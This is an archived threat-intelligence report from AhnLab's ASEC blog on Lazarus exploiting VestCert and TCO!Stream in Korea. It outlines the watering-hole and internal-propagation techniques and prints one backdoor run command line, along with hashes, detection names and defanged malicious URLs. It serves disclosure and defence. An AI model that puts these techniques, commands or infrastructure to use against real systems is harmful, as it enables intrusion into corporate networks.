{
	"id": "c4123247-f2fa-4f6c-ac6e-b577554e12c4",
	"created_at": "2026-04-06T00:10:37.515987Z",
	"updated_at": "2026-04-10T03:21:59.154067Z",
	"deleted_at": null,
	"sha1_hash": "4a4a626b89eb42ac370a6845370ff86301d9bfa8",
	"title": "Lazarus Threat Group Exploiting Vulnerability of Korean Finance Security Solution - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1586443,
	"plain_text": "Lazarus Threat Group Exploiting Vulnerability of Korean Finance\r\nSecurity Solution - ASEC\r\nBy ATCP\r\nPublished: 2023-06-07 · Archived: 2026-04-05 15:58:06 UTC\r\nAs covered before here on the ASEC Blog, the Lazarus threat group exploits the vulnerabilities of INISAFE\r\nCrossWeb EX and MagicLine4NX in their attacks. \r\nNew Malware of Lazarus Threat Actor Group Exploiting INITECH Process (Apr 26, 2022)\r\nA Case of Malware Infection by the Lazarus Attack Group Disabling Anti-Malware Programs With the\r\nBYOVD Technique (Oct 31, 2022)\r\nWhile monitoring the activities of the Lazarus threat group, AhnLab Security Emergency response Center (ASEC)\r\nrecently discovered that the zero-day vulnerability of VestCert and TCO!Stream are also being exploited in\r\naddition to the previously targeted INISAFE CrossWeb EX and MagicLine4NX. VestCert is a web security\r\nsoftware developed by Yettiesoft using a non-ActiveX approach, while TCO!Stream is a company asset\r\nmanagement program made by MLsoft. Both solutions are widely used by Korean companies. Since Lazarus\r\nactively seeks out and exploits new vulnerabilities in software used in Korea, it is highly recommended that\r\nbusinesses utilizing these software solutions promptly update to the latest versions. Malware Download via\r\nVestCert Vulnerability The threat group utilizes the watering hole method when carrying out their initial breach\r\nof companies. When users with vulnerable versions of VestCert installed on their Windows systems visit a specific\r\nhttps://asec.ahnlab.com/en/54195/\r\nPage 1 of 5\n\nwebsite that has been injected with a malicious script, then, regardless of their web browser type, PowerShell is\r\nexecuted due to a third-party library execution vulnerability in the VestCert software. As shown below,\r\nPowerShell then connects to a C2 server to download and execute malware. \r\nFigure. PowerShell command to download malware (WinSync.dll) that has been executed due to the VestCert\r\nvulnerability\r\nInternal Propagation of Malware via TCO!Stream Vulnerability The threat group uses the TCO!Stream\r\nvulnerability in order to propagate the malware to internal systems from the initially affected system. TCO!Stream\r\nconsists of a server and client; the server offers features such as software distribution to clients and remote control.\r\nIn order to communicate with the server, the client is always listening to the TCP 3511 port. The threat group,\r\nutilizing their own developed malware, generates command packets and sends them to the client. These command\r\npackets instruct the client to download and execute a specific file from the server. Upon receiving this command,\r\nthe client accesses the TCO!Stream server and proceeds to download and execute the malicious file that the threat\r\ngroup has prepared in advance. The malware created by the threat group is executed with the following command-line structure.  The meaning of each parameter in the command line is as follows. \r\n\u003cMalware\u003e: Name of the malicious file (MicrosoftVSA.bin, MicroForic.tlb, matrox86.bic, matrox86.tcm,\r\nmatrox86.tcm, wincert.bin, mseng.bin)\r\n\u003cTCO DeviceID\u003e: Device ID of the TCO server\r\n\u003cDestination IP\u003e: System IP of the target client\r\n\u003cDestination Port\u003e: Port of the target client system (3511)\r\n\u003cJob ID\u003e: Job ID used in the server\r\nhttps://asec.ahnlab.com/en/54195/\r\nPage 2 of 5\n\nFigure. Parts of the decrypted command data (for analysis)\r\nLocation of the distributed file: C:\\Packages\\\u003cDistribution module name\u003e\\\u003cVersion\u003e\\\u003cFinal path\u003e\\\u003cName\r\nof distributed file\u003e\r\nRun command: loadconf.exe –rt5y65i8##7poi88++5t4t54t54t5n\r\nThe above command downloads loadconf.exe, a backdoor downloader, in the path C:\\Temp\\ and executes it with\r\nan argument. Vulnerability Information ASEC has analyzed the VestCert and TCO!Stream vulnerabilities that\r\nwere exploited in this case and reported them to Korea Internet \u0026 Security Agency (KISA). The information was\r\nalso given to the respective companies and the current vulnerabilities in questions have been patched. On March\r\n13, a security advisory post titled “Update Recommendation for Finance Security Solutions” was posted on\r\nKISA’s vulnerability information portal (https://knvd.krcert.or.kr/detailSecNo.do?IDX=5881). However, the\r\nsoftware in question do not update automatically, so there are still many places using vulnerable versions of the\r\nsoftware. It is advised to manually uninstall the software before reinstalling. Information regarding the VestCert\r\nand TCO!Stream vulnerabilities have been covered before on the ASEC Blog, and the following shows the\r\nvulnerable versions and the resolved versions for each software. VestCert \r\nVulnerability information: Warning for Certification Solution (VestCert) Vulnerability and Update\r\nRecommendation (Mar 23, 2023)\r\nAffected versions: 2.3.6 ~ 2.5.29\r\nResolved version: 2.5.30\r\nTCO!Stream \r\nhttps://asec.ahnlab.com/en/54195/\r\nPage 3 of 5\n\nVulnerability information: Warning for Asset Management Program (TCO!Stream) Vulnerability and\r\nUpdate Recommendation (Mar 23, 2023)\r\nAffected versions: 8.0.22.1115 and below\r\nResolved version: 8.0.23.215\r\nAhnLab detects and blocks the malware, malicious behavior, and URL using the following aliases. [File\r\nDetection] \r\nTrojan/Win.Lazardoor (2023.01.11.03)\r\nData/BIN.EncodedPE (2023.01.12.00)\r\nData/BIN.EncodedPE (2023.01.12.00)\r\nTrojan/Win.Lazardoor (2022.01.05.01)\r\nTrojan/Win.Lazardoor (2023.01.11.03)\r\nData/BIN.EncodedPE (2023.01.12.00)\r\nData/BIN.EncodedPE (2023.01.12.00)\r\nTrojan/Win.Agent (2023.01.12.03)\r\nTrojan/Win.LazarLoader(2023.01.21.00)\r\n[Behavior Detection] \r\nInitialAccess/EDR.Lazarus.M10963\r\nExecution/EDR.Event.M10769\r\nInjection/EDR.Lazarus.M10965\r\nFileless/EDR.Event.M11080\r\nMD5\r\n064d696a93a3790bd3a1b8b76baaeef3\r\n55f0225d58585d60d486a3cc7eb93de5\r\n67d306c163b38a06e98da5711e14c5a7\r\n747177aad5aef020b82c6aeabe5b174f\r\n8adeeb291b48c97db1816777432d97fd\r\nAdditional IOCs are available on AhnLab TIP.\r\nSHA1\r\n3ca6abf845f3528edf58418e5e42a9c1788efe7a\r\nec5d5941522d947abd6c9e82e615b46628a2155f\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttps://asec.ahnlab.com/en/54195/\r\nPage 4 of 5\n\nhttp[:]//ksmarathon[.]com/admin/excel2[.]asp\r\nhttp[:]//www[.]sinae[.]or[.]kr/sub01/index[.]asp\r\nhttps[:]//swt-keystonevalve[.]com/data/content/cache/cache[.]php?mode=read\r\nhttps[:]//www[.]bcdm[.]or[.]kr/board/type3_D/edit[.]asp\r\nhttps[:]//www[.]coupontreezero[.]com/include/bottom[.]asp\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/54195/\r\nhttps://asec.ahnlab.com/en/54195/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/54195/"
	],
	"report_names": [
		"54195"
	],
	"threat_actors": [],
	"ts_created_at": 1775434237,
	"ts_updated_at": 1775791319,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4a4a626b89eb42ac370a6845370ff86301d9bfa8.pdf",
		"text": "https://archive.orkl.eu/4a4a626b89eb42ac370a6845370ff86301d9bfa8.txt",
		"img": "https://archive.orkl.eu/4a4a626b89eb42ac370a6845370ff86301d9bfa8.jpg"
	}
}